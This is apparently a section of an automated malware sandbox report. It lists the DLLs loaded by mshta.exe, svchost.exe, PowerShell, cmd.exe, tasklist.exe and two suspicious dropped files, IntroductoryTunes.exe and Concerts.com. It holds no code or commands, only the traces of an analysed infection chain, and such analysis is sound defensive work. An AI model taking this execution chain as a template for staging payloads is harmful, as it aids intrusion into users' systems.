Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: imgutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: gpapi.dll	Jump to behavior
